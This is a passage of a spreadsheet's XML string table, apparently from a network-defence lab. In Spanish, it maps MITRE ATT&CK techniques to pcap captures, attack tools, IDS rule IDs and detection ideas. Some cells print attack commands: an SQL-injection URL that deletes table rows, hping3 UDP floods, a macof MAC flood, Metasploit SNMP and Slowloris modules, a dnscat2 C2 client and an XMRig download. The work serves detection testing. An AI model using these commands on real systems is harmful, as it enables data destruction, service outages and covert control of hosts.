        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100469, 2100384, 2002752, 2002749, 2100366, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100472</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100469, 2100472, 2002749, 2100408</t>
  </si>
  <si>
    <t xml:space="preserve">Regla personalizada que detecte envío de paquetes ICMP Redirect por parte de un equipo que no debería intervenir en labores de redirección </t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forzar intento de autenticación en un servidor para obtener credenciales de acceso</t>
  </si>
  <si>
    <t>SMB, NTLMssp-Extract</t>
  </si>
  <si>
    <t>ForcedAuthentication.pcapng, ForcedAuthentication2.pcapng</t>
  </si>
  <si>
    <t>44486,44484,44488</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486,44484,44488</t>
    </r>
  </si>
  <si>
    <t>Monitorizar tráfico SMB en puertos TCP 139,445, puerto UDP 137 y tráfico WebDAV</t>
  </si>
  <si>
    <t>Servidor SMB. El atacante captura el tráfico de red del intento de autenticación mediante Wireshark y aplica fuerza bruta a las credenciales capturadas</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>Obtención de credenciales del usuario krbtgt (Usuario Kerberos Active Directory)</t>
  </si>
  <si>
    <t>mimikazt</t>
  </si>
  <si>
    <t>T1003_os-credential-dumping-dcsync.pcapng</t>
  </si>
  <si>
    <t>Regla compuesta que detecte una llamada DCERPC Bind a la API DRSUAPI seguida de una llamada a la función DsGetNCChanges</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Recogida MIB de un equipamiento</t>
  </si>
  <si>
    <t>T1602.001.pcapng</t>
  </si>
  <si>
    <t>1411, 1417</t>
  </si>
  <si>
    <t>2101411,1411,1417</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101411,2101417</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1411,1417</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101417, 2101411, 2002749</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso del protocolo SNMP sobre UDP para acceder a la comunidad public</t>
  </si>
  <si>
    <t>Este ataque obtiene informacion de la MIB de un equipo mediante peticiones SNMP. Comando: msfconsole -x "use auxiliary/scanner/snmp/snmp_enum; set RHOSTS 192.168.2.2; run; exit"</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1213.pcapng</t>
  </si>
  <si>
    <t>Robar informacion de la victima obteniendo el contenido guardado en una tabla SQL. Comando: SELECT * FROM tabla</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Descarga de archivos de interés disponibles en una red compartida</t>
  </si>
  <si>
    <t>Comando Net Use</t>
  </si>
  <si>
    <t>T1039_data-from-network-shared-drive.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, copia repentina de ficheros compartidos por red.</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Recolección de correos electrónicos de un servidor Microsoft Exchange haciendo uso de credenciales robadas</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>T1114_email-collection-remote-email-collection.pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044666, 2100628</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, peticiones LDAP espontáneas desde un equipo de la red, haciendo uso de una cuenta con credenciales válidas. </t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>T1565.001.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <t>Reglas personalizadas que detecten ataques de inyeccion SQL mediante la presencia del caracter "%27"</t>
  </si>
  <si>
    <t>El objetivo es generar daño en la BBDD. Queremos borrar lineas de una tabla. Comando: http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20DELETE%20FROM%20contactos%20WHERE%20num=3--</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>Denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>T1499.001.pcapng</t>
  </si>
  <si>
    <t>2012870, 40063</t>
  </si>
  <si>
    <t>2002752,2002749,2012870,40063</t>
  </si>
  <si>
    <t>Uso de metasploit para ataque DoS con herramienta Slowloris. Comando: use auxiliary/dos/http/slowloris</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Suplantación MAC</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>T1499_mac_spoof.pcapng</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408, 2101620</t>
  </si>
  <si>
    <t xml:space="preserve">2002749, 2002752 </t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Reseteo de Conexión</t>
  </si>
  <si>
    <t>ettercap, netwox, nping</t>
  </si>
  <si>
    <t>T1499_reseteo.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique reseteos de conexión periódicos y desde direcciones sospechosas</t>
  </si>
  <si>
    <t>Inundación SYN con suplantación</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t>T1499_syn_suplantacion.pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío prolongado de mensajes TCP SYN que dejan los sockets del equipo a proteger en estado SYN-RECV (no se terminan los handshake de las conexiones TCP establecidas)</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>T1499_land.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100527, 2002752, 2002749, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
  </si>
  <si>
    <t>Inundación DHCP / Inanición</t>
  </si>
  <si>
    <t>DHCPig, yersinia</t>
  </si>
  <si>
    <t>T1499_dhcp_flood.pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK)</t>
  </si>
  <si>
    <t>Reflexión SYN-ACK</t>
  </si>
  <si>
    <t>T1499_reflexion_synack.pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes TCP SYN-ACK no solicitados previamente por el la red a proteger</t>
  </si>
  <si>
    <t>SI                                                    (el propio ataque consiste en el envío de peticiones incompletas al servidor)</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Slowhttptest</t>
  </si>
  <si>
    <t>T1499.02-Slowhttptest-C2018.pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Uso de Slowhttptest para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP parciales</t>
  </si>
  <si>
    <t>Slowloris</t>
  </si>
  <si>
    <t>T1499.02-Slowloris-C2018.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>15578</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002749,2002752</t>
    </r>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP parciales o uso de Slowloris</t>
  </si>
  <si>
    <t>Uso de Slowloris para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Hulk</t>
  </si>
  <si>
    <t>T1499.03-Hulk-C2018.pcapng</t>
  </si>
  <si>
    <t>2002192,2002749,2002752,2002822,2012801,2012914</t>
  </si>
  <si>
    <t xml:space="preserve"> Reglas que detecen envío masivo de solicitudes a servidor web</t>
  </si>
  <si>
    <t>Uso de Hulk para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>GoldenEye</t>
  </si>
  <si>
    <t>T1499.03-GoldenEye-C2018.pcapng</t>
  </si>
  <si>
    <t>2002749,2002752,2106897</t>
  </si>
  <si>
    <t>Uso de GoldenEye para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Inundación tabla MAC</t>
  </si>
  <si>
    <t>Macof</t>
  </si>
  <si>
    <t>T1498.001-MAC_table_flood.pcapng</t>
  </si>
  <si>
    <t>2101917,2002749,2002752,2100528,1917</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917</t>
  </si>
  <si>
    <t>Inundacion tabla MAC mediante Macof. Comando: sudo macof -i enp0s9 -d 172.16.1.1</t>
  </si>
  <si>
    <t>Inundación UDP</t>
  </si>
  <si>
    <t>Low Orbit Ion Canon (LOIC) for UDP, TCP, or HTTP requests</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1-C2018.pcapng</t>
  </si>
  <si>
    <t>402, 2002749, 2100402, 2002752</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de mensajes UDP con destino el mismo puerto objetivo</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2-C2018.pcapng</t>
  </si>
  <si>
    <t>2002749,2002752,2100402,2100525,402</t>
  </si>
  <si>
    <t>Inundación HTTP</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood-C2018.pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes HTTP</t>
  </si>
  <si>
    <t>Inundación TCP</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood-C2018.pcapng</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes TCP</t>
  </si>
  <si>
    <t xml:space="preserve">  Caldera, hping3</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood.pcapng</t>
  </si>
  <si>
    <t>2100525,2002752,2002749,2100402,402</t>
  </si>
  <si>
    <t>2002752, 2100402, 2002749</t>
  </si>
  <si>
    <t>Inundacion UDP en la red de la víctima. Comando: timeout 10s hping3 --udp --flood 192.168.2.2</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Amplificación DNS</t>
  </si>
  <si>
    <t>dnsdrdos</t>
  </si>
  <si>
    <t>T1498_amplif_dns.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
  </si>
  <si>
    <t>Fraggle</t>
  </si>
  <si>
    <t>T1498_fraggle.pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de datagramas UDP hacia un puerto concreto, con fin de saturarlo y causar su inoperatividad</t>
  </si>
  <si>
    <t>Smurf</t>
  </si>
  <si>
    <t>T1498_smurf.pcapng</t>
  </si>
  <si>
    <t>2100527, 2002749, 2100408, 2002752, 2101620</t>
  </si>
  <si>
    <t>2002752, 2100527, 2101620, 2100408, 2002749</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas ICMP</t>
  </si>
  <si>
    <t>Inundación de TCBPDU</t>
  </si>
  <si>
    <t>T1498_tcbpdu.pcapng</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Descarga y puesta en marcha de software de criptominado</t>
  </si>
  <si>
    <t>XMRIG</t>
  </si>
  <si>
    <t>T1496.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,254</t>
  </si>
  <si>
    <t>Instalacion y uso de software de minado. Comando: wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Modificar fondo de pantalla equipo victima</t>
  </si>
  <si>
    <t>T1491.001.pcapng</t>
  </si>
  <si>
    <t>Detectable por listas negras/anomalías</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Command - Control via DNS</t>
  </si>
  <si>
    <t>dnscat2</t>
  </si>
  <si>
    <t>T1071_tunel.pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecta uso de dnscat</t>
  </si>
  <si>
    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Sesión Remota + Ataque C2</t>
  </si>
  <si>
    <t>RDP, Covenant</t>
  </si>
  <si>
    <t>T1104_multi-stage-channels.pcapng</t>
  </si>
  <si>
    <t>2027792, 2027793</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
  </si>
  <si>
    <t>NO (fuera del alcance de la red a proteger)</t>
  </si>
  <si>
    <t>SI [1]. Establecimiento de conexión C&amp;C</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Traspaso de canal primario C2 a canal alternativo</t>
  </si>
  <si>
    <t>Covenant</t>
  </si>
  <si>
    <t>T1008_fallback-channels.pcapng</t>
  </si>
  <si>
    <t>2027792, 2027793, 2027326</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749</t>
  </si>
  <si>
    <t>La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Subida de información confidencial a Workspace de Google Drive</t>
  </si>
  <si>
    <t>Covenant, Google Drive API</t>
  </si>
  <si>
    <t>T1102.003_web-service-one-way-communication.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2002752, 2002749, 2100628</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
  </si>
  <si>
    <t xml:space="preserve">SI [1]. Establecimiento de conexión C&amp;C </t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
  </si>
  <si>
    <t>T1090_proxy-internal-proxy.pcapng</t>
  </si>
  <si>
    <t>2027794, 2027793, 2027792</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027794, 2027793, 2027792</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, 2002752, 2002749, 2101620 </t>
    </r>
  </si>
  <si>
    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
  </si>
  <si>
    <t>FakeTLS (raykaryshyn Github)</t>
  </si>
  <si>
    <t>T1001_data-obfuscation-protocol-impersonation.pcapng</t>
  </si>
  <si>
    <t>20022752, 2002749</t>
  </si>
  <si>
    <t>Regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Inserción de información confidencial en una imagen JPG</t>
  </si>
  <si>
    <t>Covenant, SSH, scp, Powershell</t>
  </si>
  <si>
    <t>T1001.002_data-obfuscation-steganography.pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100628</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
  </si>
  <si>
    <t>Metasploit, FTP</t>
  </si>
  <si>
    <t>T1105.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027768</t>
    </r>
  </si>
  <si>
    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
  </si>
  <si>
    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
  </si>
  <si>
    <t>Metasploit, curl, base64</t>
  </si>
  <si>
    <t>Deteccion por anomalias</t>
  </si>
  <si>
    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
  </si>
  <si>
    <t>TeamViewer</t>
  </si>
  <si>
    <t>RemoteAccessSoftwareLocal.pcapng, RemoteAccessSoftwareNAT.pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías. Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...)</t>
  </si>
  <si>
    <t>Conexion mediante TeamViewer entre dos equipos</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
  </si>
  <si>
    <t>bind, Metasploit</t>
  </si>
  <si>
    <t>T1568_fastFluxDNS.pcapng</t>
  </si>
  <si>
    <t>366,29456,384,408</t>
  </si>
  <si>
    <t>366,29456,384,408,2100366</t>
  </si>
  <si>
    <t>366,29456,384,408,2002752,2002749,2100366,2100384,2100408</t>
  </si>
  <si>
    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Deteccion por anomalias o listas negras</t>
  </si>
  <si>
    <t>Servidor DNS "Round Robin"</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un Proxy</t>
  </si>
  <si>
    <t>Metasploit, HTTP Server</t>
  </si>
  <si>
    <t>T1665.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2100628</t>
  </si>
  <si>
    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un proxy</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
  </si>
  <si>
    <t>SSH, Metasploit</t>
  </si>
  <si>
    <t>T1572.pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
  </si>
  <si>
    <t>Tunelizar una conexion mediante SSH</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Assymetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encriptar conexion con C2 Server</t>
  </si>
  <si>
    <t>Metasploit, OpenSSL</t>
  </si>
  <si>
    <t>T1573.002.pcapng</t>
  </si>
  <si>
    <t>Encriptar conexion al C2 Server</t>
  </si>
  <si>
